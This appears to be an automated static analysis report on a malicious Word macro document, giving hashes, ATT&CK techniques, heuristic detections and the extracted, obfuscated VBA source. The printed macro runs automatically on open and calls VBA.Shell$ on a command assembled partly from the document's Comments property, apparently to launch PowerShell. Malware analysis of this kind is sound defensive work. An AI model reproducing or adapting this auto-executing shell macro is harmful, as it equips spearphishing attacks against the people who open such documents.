Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1b3d24ea2a34b2b8…

MALICIOUS

Office (OLE)

60.5 KB Created: 2017-10-02 18:22:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: e2396e34470a3e17ed488307b0906715 SHA-1: 08c6967b3214cc943ac923fd5915f68a9d4c7a7a SHA-256: 1b3d24ea2a34b2b8489fda447787b1c0bfcbcab3536f52d1bd4d65c71e16f746
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of macros, a potential shell call, and a reference to PowerShell. The autoopen macro is present, suggesting execution upon opening. The VBA script, though obfuscated, contains concatenations that likely form commands to execute PowerShell, which is a common technique for downloading and executing further stages.

Heuristics 8

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    nnKrwWUUfs = "tsLFBgA" + "uuhbRSYUptE" + "gfHXEvbUFxk" + "BmXMnSNdL" + "ZtYzXBhta" + "kXCRNaF" + "uBfDfsv" + rReaypzCchx = "UbxvWnuh" + "PrZMVcHL" + "zdbLLTgpVP" + "gwBKGyS" + "rPkLycu" + "VezGRWshmrZ" + "gvDBfLHZK" + crVsLrRf = "nrWpnDaac" + "DFXsXcV" + "GBMuMVs" + "FxxZNFRZwKL" + "nCMwavZ" + "pSGsLVxLD" + "THfgBvHPX" + xxyFpUFWh = "pEMzfkkXd" + "nkZUXLv" + "FkSSzGcvgXh" + "mSUZcBXHZs" + "kKhyAUHgMtc" + "eNnLsFbYSb" + "ZRCzAry" + WVktMByPtU = "sLmSEFhcBPL" + "DGcDedFDCL" + "ReGCpFKcAPB" + "PZRX …
VBA.Shell$ "" + YvVcMEx + PdYRWWgaMd + hNKPVSMReY + hMACKLX + MRwXLGwhU + EhwfdWSwMAA + bXkyrrG + ULLkEFfdsha + vravmUdka + wrnskVGSP + MtssxVaNy + tUfcESUWLA + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + YvVcMEx + PdYRWWgaMd + hNKPVSMReY + hMACKLX + MRwXLGwhU + EhwfdWSwMAA + bXkyrrG + ULLkEFfdsha + vravmUdka + wrnskVGSP + MtssxVaNy + tUfcESUWLA + BfTEYcmnE, 0
CWnCprYVefT = "yvvrZAke" + "bXSEYYr" + "CnTwSza" + "HpLUwYT" + "vcLGRzGFZM" + "kZGbnGt" + "UDDZUaLCr" + zmuuFsC = "HUKMTGzeeB" + "htFgKWrauY" + "xYzzPtcSFZZ" + "bhPNYng" + "BkwkEzNyRA" + "tLPSWBGVLKE" + "kLhmXmd" + "LkUtswTP"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub autoopen()
rfnshyeguc
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4846 bytes
SHA-256: a6df6d687efa1e2e2e2e60049029189b366b561462cb54ba6a91aa7e6b896248
Detection
ClamAV: No threats found
Obfuscation or payload: likely
284 of 327 identifiers look randomly generated (e.g. 'gfHXEvbUFxk') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
rfnshyeguc
End Sub
Function rfnshyeguc()
TxxTpDWStu = "eXfVXvwXhe" + "PKDnEHfHDTp" + "gpKxeYTLbXs" + "cKXumZrznEa" + "zXWgpGwyyXh" + "PDhXptyrUbH" + "ZSfnTtuzhx" + FHHEfwtMA = "bUzWypCp" + "AmGRvuMX" + "XWmmHmgK" + "SctDxzZsL" + "kELbBwNHW" + "ehXsRTD" + "LumAVGF" + NXwZPEuCB = "vNaXcRtPm" + "tVUKgtgG" + "YrwhYacAHv" + "LYnERfFyCsm" + "DarvvNysrAF" + "fycEtTuM" + "wxaYMscYut" + NhVkWkzyb = "xPwVkANWS" + "eyfzBwzf" + "NWtPcbcp" + "rpCCMHzZEu" + "KXRzzBcfM" + "gpmUrUzCxrr" + "vHBTWCn" + ksSFfKGPmTE = "suCpxRuBT" + "yRgbTGhER" + "AnGdcGSCKv" + "gfWFtmKbfSm" + "tSKBFEUfTM" + "uUknbgT" + "xEGyMzD" + xsKCREVZX = "vUWkkFGLw" + "BDhpbyxt" + "XNbCHgmvzzN" + "BecamTf" + "feDCFeadF" + "LDKLkXXUdu" + "rNRZVCXWu" + "MALxNkNgDEa"
VAzGkYWkH = "DPtRKBA" + "FsFfPWBkgbm" + "Ufhbmusd" + "mXsBzfmzm" + "eMuTKpp" + "zkdCMCv" + "YFuNPAkH" + hySEhRkV = "WgCkNTaUw" + "MKZPWXkF" + "LzxKZswyfwX" + "EYCzwHrabM" + "uGkRkvavX" + "PVaAfnsWt" + "RkaGMpCF" + HnxNPCChn = "dutyLpgCPnt" + "DXkVhhunhPU" + "gTucxxxxvcc" + "EPSWRHnnG" + "NyBMMaxx" + "dnMGTvyS" + "XeSGYunSgwB" + zheyTTxRW = "gmTCXLEHf" + "spFcvuv" + "zVhLtfNs" + "GfftzcFxH" + "xxybvZS" + "sEHuZLAfUSx" + "VKgWkLdM" + UcTRxEu = "tnnAubrMNY" + "yUVCnCwyP" + "UkTrrTdbYhT" + "SKGkKpAbPDv" + "ZvpPTynyWa" + "LkWHbZSTP" + "EUPCtmr" + aFekaYcsge = "ALXuHmkTXZA" + "tkSbEfrcc" + "pMwzXhvKc" + "PWkgHgSMe" + "kKBbudHZZh" + "VCzhfMYxmB" + "DLtZaFPcFvW" + "VtyyFKaRVp"
ANvWWyAncv = "bVVEbMnRBA" + "FFsDUusXcBT" + "LvVauKesZt" + "hxGhWWsSuxc" + "YaXPgNuxY" + "GHAKKpmUfUK" + "ybPsWpZm" + sFkLBwcdXrB = "wWwuAupMb" + "WdCXNCx" + "KzGXbwHsVdH" + "BerWcLZxr" + "gpWsbEHWLC" + "XnubwMbMwP" + "VykXmha" + VYfLwmDg = "ASLBbXF" + "dTPesMgCg" + "twMZeATCtk" + "mkxuHkFp" + "GEzGMFx" + "zpypCcnaP" + "SSAckmFCdgD" + awvFcSnxkp = "sbSdzgXtE" + "ptXZwMZLnPn" + "DPAbmGyRE" + "ZybfGrbm" + "UDkNcERaK" + "uVeCEfs" + "EGPhNuwkCY" + "kFRegZtg"
nnKrwWUUfs = "tsLFBgA" + "uuhbRSYUptE" + "gfHXEvbUFxk" + "BmXMnSNdL" + "ZtYzXBhta" + "kXCRNaF" + "uBfDfsv" + rReaypzCchx = "UbxvWnuh" + "PrZMVcHL" + "zdbLLTgpVP" + "gwBKGyS" + "rPkLycu" + "VezGRWshmrZ" + "gvDBfLHZK" + crVsLrRf = "nrWpnDaac" + "DFXsXcV" + "GBMuMVs" + "FxxZNFRZwKL" + "nCMwavZ" + "pSGsLVxLD" + "THfgBvHPX" + xxyFpUFWh = "pEMzfkkXd" + "nkZUXLv" + "FkSSzGcvgXh" + "mSUZcBXHZs" + "kKhyAUHgMtc" + "eNnLsFbYSb" + "ZRCzAry" + WVktMByPtU = "sLmSEFhcBPL" + "DGcDedFDCL" + "ReGCpFKcAPB" + "PZRXyhGxEr" + "gRYMbeZKHxS" + "xfZMekLE" + "ScWuVyrwVPt" + tSSseMwY = "sbzEmUX" + "NrrRHRKRZ" + "ShfchKZCcrz" + "ZyVUKxg" + "GXZcSGfGX" + "ZdBpYuVyG" + "cGYgLXghe" + "nwayrfK"
VBA.Shell$ "" + YvVcMEx + PdYRWWgaMd + hNKPVSMReY + hMACKLX + MRwXLGwhU + EhwfdWSwMAA + bXkyrrG + ULLkEFfdsha + vravmUdka + wrnskVGSP + MtssxVaNy + tUfcESUWLA + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + YvVcMEx + PdYRWWgaMd + hNKPVSMReY + hMACKLX + MRwXLGwhU + EhwfdWSwMAA + bXkyrrG + ULLkEFfdsha + vravmUdka + wrnskVGSP + MtssxVaNy + tUfcESUWLA + BfTEYcmnE, 0
CWnCprYVefT = "yvvrZAke" + "bXSEYYr" + "CnTwSza" + "HpLUwYT" + "vcLGRzGFZM" + "kZGbnGt" + "UDDZUaLCr" + zmuuFsC = "HUKMTGzeeB" + "htFgKWrauY" + "xYzzPtcSFZZ" + "bhPNYng" + "BkwkEzNyRA" + "tLPSWBGVLKE" + "kLhmXmd" + "LkUtswTP"
EpvbTGPCzFA = "UKvtZUf" + "bADptSW" + "KCKAPHsaXx" + "WNBWrptU" + "wrVMzhN" + "VvkfUxr" + "DAubyTUp" + NzTXHdgEsSS = "nAGPgEthR" + "bdUUAfHDsgB" + "snVfzBfCtE" + "cZsVzNXM" + "AebFbxxTPpt" + "ezaepKpsYPN" + "VDGGWzCZAHZ" + DfmHaeL = "PrMMWCM" + "xtSLDpWKXaP" + "ZNPyaezvTN" + "vBmCzCLAket" + "yUkGetXVnse" + "NXvUXWCcbCh" + "LagfUSDWZg" + fXHWvwAD = "BXWvsTAu" + "cSGPBCXm" + "UgsfyMVsFd" + "TZpvGgLFpn" + "HYyUrmmAr" + "yPgGnuddy" + "rWYutUXdy" + nFMpNrpWW = "dknLpRc" + "czPpuaKpL" + "BLevLnw" + "NSgBTmkxRfC" + "ZRMpZaG" + "AwpEknKwLXH" + "WPsUKKCuN" + pagYRxTHMn = "RgDuHSw" + "fkfTueDWXD" + "RyHUKgK" + "eyStERxhceZ" + "YwaSNGB" + "mVwWCXS" + "kXvgDPED" + "pNeBxFppNFx"
hhtsYkgnC = "CnDmdfC" + "beTVDvA" + "LaRAhdvHE" + "stWmHcdPkpa" + "rkrcGwdT" + "MBMrrpeKyS" + "xDhwYHz" + rkvUseLtT = "ZeWDRDca" + "yRsSrsdrWF" + "WTtZUgX" + "nWcUdmXD" + "khEtvCBc" + "RhxMgmTpFTM" + "xFUBXPVZ" + rnhxhpU = "hWxuHmWHeb" + "nKpKbDTZR" + "vStHzDzNf" + "uLuSyCZMf" + "sFPXrCrHrN" + "UFxYVwBcxC" + "TmvGaansS" + "BEyywSV"
NzBKkmZ = "sPdGerYfWD" + "nBVHzCyEsC" + "SNNLZAMbcT" + "bhRwEhF" + "GZfBeWPHLMr" + "aawzRzUz" + "tGdbnFfRBK" + DeEuBaHRBsd = "HSXXBFNNY" + "pPtFZMH" + "cTcLvnnG" + "RZwteSB" + "kxvVprEkT" + "SPXzPntwg" + "cWwTZWf" + ndCzgLfLNmb = "RSeYncT" + "zFfyCus" + "WkXrUwK" + "WzdNAfeDXG" + "KWkPUgXfwhW" + "kPXZumND" + "HUPAAKDZYR" + "LEuTMHdap"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.